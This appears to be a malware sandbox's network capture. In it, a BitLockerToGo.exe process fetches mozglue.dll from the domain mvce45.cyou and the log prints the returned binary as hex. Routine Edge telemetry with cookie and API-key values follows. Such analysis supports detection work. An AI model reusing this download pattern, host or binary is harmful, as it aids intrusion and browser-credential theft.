                                                                                                                                                                                                                                                                                                                  Data Ascii: 07774733095 }, { "key": "12bbefc05d5142e7eb686fad8dea9211", "value": -1.05717753118094 }, { "key": "ce5fb8df125a4721d1df328bc6f2ddea", "value":
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 20 2d 31 2e 39 30 31 33 34 36 37 39 37 33 36 34 32 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 66 32 33 35 64 63 66 36 62 34 32 39 62 61 34 31 36 64 63 65 37 34 64 34 62 36 66 62 63 34 37 62 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 31 2e 32 36 30 31 38 31 31 38 35 36 30 38 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 38 66 31 37 64 37 34 30 33 61 63 35 66 66 32 38 39 36 61 37 31 33 61 37 31 37 35 65 64 31 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61
                                                                                                                                                                                                                                                                                                                  Data Ascii: -1.9013467973642 }, { "key": "f235dcf6b429ba416dce74d4b6fbc47b", "value": 1.26018118560884 }, { "key": "c8f17d7403ac5ff2896a713a7175ed19", "va
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 36 62 64 32 65 65 33 36 63 30 33 66 36 66 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 35 2e 38 35 39 38 36 34 33 39 33 34 36 35 37 36 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 66 64 32 61 66 36 30 63 38 35 30 31 39 33 31 63 62 39 63 37 33 36 62 35 61 64 37 34 66 36 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 33 2e 39 35 36 39 39 35 33 35 33 36 34 30 30 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 32 63 38 34 38 35 34 38 64 34 36 30 63
                                                                                                                                                                                                                                                                                                                  Data Ascii: 6bd2ee36c03f6f", "value": 5.85986439346576 }, { "key": "efd2af60c8501931cb9c736b5ad74f65", "value": 3.95699535364003 }, { "key": "2c848548d460c
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 20 22 6b 65 79 22 3a 20 22 65 31 36 38 36 30 37 38 64 31 62 36 30 64 33 35 31 64 61 35 61 38 37 35 34 33 61 32 61 36 36 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 37 2e 35 30 36 36 35 35 32 34 32 36 32 35 35 31 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 33 61 33 34 31 37 66 35 66 32 30 61 30 33 61 39 38 39 37 33 36 38 39 38 38 37 66 62 37 32 61 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 37 34 39 32 32 35 31 37 36 34 32 37 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                  Data Ascii: "key": "e1686078d1b60d351da5a87543a2a663", "value": 7.50665524262551 }, { "key": "3a3417f5f20a03a98973689887fb72a2", "value": -1.74922517642794 }, {
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 62 30 64 61 32 37 35 35 32 30 39 31 38 65 32 33 64 64 36 31 35 65 32 61 37 34 37 35 32 38 66 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 39 37 36 31 34 30 37 39 32 39 31 35 33 37 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 66 61 62 31 62 61 38 63 36 37 63 37 63 38 33 38 64 62 39 38 64 36 36 36 66 30 32 61 31 33 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 31 31 37 38 37 35 38 36 30 34 35 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: { "key": "b0da275520918e23dd615e2a747528f1", "value": -0.976140792915373 }, { "key": "cfab1ba8c67c7c838db98d666f02a132", "value": -1.11787586045094 },
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16053INData Raw: 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 64 65 39 35 62 34 33 62 63 65 65 62 34 62 39 39 38 61 65 64 34 61 65 64 35 63 65 66 31 61 65 37 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 33 33 31 39 35 35 36 37 30 31 31 37 37 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 61 64 64 65 63 34 32 36 39 33 32 65 37 31 33 32 33 37 30 30 61 66 61 31 39 31 31 66 38 66 31 63 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 30 2e 31 36 30 39 38 34 33 32 38 39 38 35 39 32 34 0d
                                                                                                                                                                                                                                                                                                                  Data Ascii: }, { "key": "de95b43bceeb4b998aed4aed5cef1ae7", "value": -1.03319556701177 }, { "key": "addec426932e71323700afa1911f8f1c", "value": 0.160984328985924


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  41192.168.2.84981449.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:43 UTC237OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:43 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 608080
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thursday, 21-Nov-2024 14:48:43 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                                                                                                                                                                                                                                                  Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                                                                                                                                                                                                                                                  Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                                                                                                                                                                                                                                                  Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                                  Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                                                                                                                                                                                                                                                  Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                                                                                                                                                                                                                                                  Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                                                                                                                                                                                                                                                  Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                                                                                                                                                                                                                                                  Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  42192.168.2.84981920.189.173.24431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC1017OUTPOST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-2.2.2&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732200512000&w=0&anoncknm=app_anon HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 4724
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=252611C791E3634C2B3C04F990FA6290; _EDGE_S=F=1&SID=13E45F7E6D0B6E511AE34A406C8E6FA4; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC4724OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 41 70 70 45 72 72 6f 72 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 31 54 31 34 3a 34 38 3a 33 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 64 61 74 61 22 3a 7b 22 62 61 73 65 44 61 74 61 22 3a 7b 7d 2c 22 62 61 73 65 54 79 70 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 42 61 73 65 22 2c 22 70 61 67 65 22 3a 7b 22 6e 61 6d 65 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 70 72 6f 64 75 63 74 22 3a 22 61 6e 61 68 65 69 6d 22 2c 22 74 79 70 65 22 3a 22 64 68 70 22 2c 22 63 6f 6e 74 65 6e 74 22 3a 7b 22 63 61 74 65 67 6f 72 79 22 3a 22 73 74 61 6e 64
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.AppError","time":"2024-11-21T14:48:32Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","data":{"baseData":{},"baseType":"MS.News.Web.Base","page":{"name":"default","product":"anaheim","type":"dhp","content":{"category":"stand
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC917INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Content-Length: 153
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=9da112a96bf94f3cb2924374b3afc148&HASH=9da1&LV=202411&V=4&LU=1732200524671; Domain=.microsoft.com; Expires=Fri, 21 Nov 2025 14:48:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=374b8288fc0d479891d0f6bbcb381aa1; Domain=.microsoft.com; Expires=Thu, 21 Nov 2024 15:18:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  time-delta-millis: 12671
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:44 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC153INData Raw: 7b 22 61 63 63 22 3a 31 2c 22 77 65 62 52 65 73 75 6c 74 22 3a 7b 22 6d 73 66 70 63 22 3a 22 47 55 49 44 3d 39 64 61 31 31 32 61 39 36 62 66 39 34 66 33 63 62 32 39 32 34 33 37 34 62 33 61 66 63 31 34 38 26 48 41 53 48 3d 39 64 61 31 26 4c 56 3d 32 30 32 34 31 31 26 56 3d 34 26 4c 55 3d 31 37 33 32 32 30 30 35 32 34 36 37 31 22 2c 22 6d 63 31 22 3a 22 39 64 61 31 31 32 61 39 36 62 66 39 34 66 33 63 62 32 39 32 34 33 37 34 62 33 61 66 63 31 34 38 22 7d 7d
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"acc":1,"webResult":{"msfpc":"GUID=9da112a96bf94f3cb2924374b3afc148&HASH=9da1&LV=202411&V=4&LU=1732200524671","mc1":"9da112a96bf94f3cb2924374b3afc148"}}


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  43192.168.2.84981820.189.173.24431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
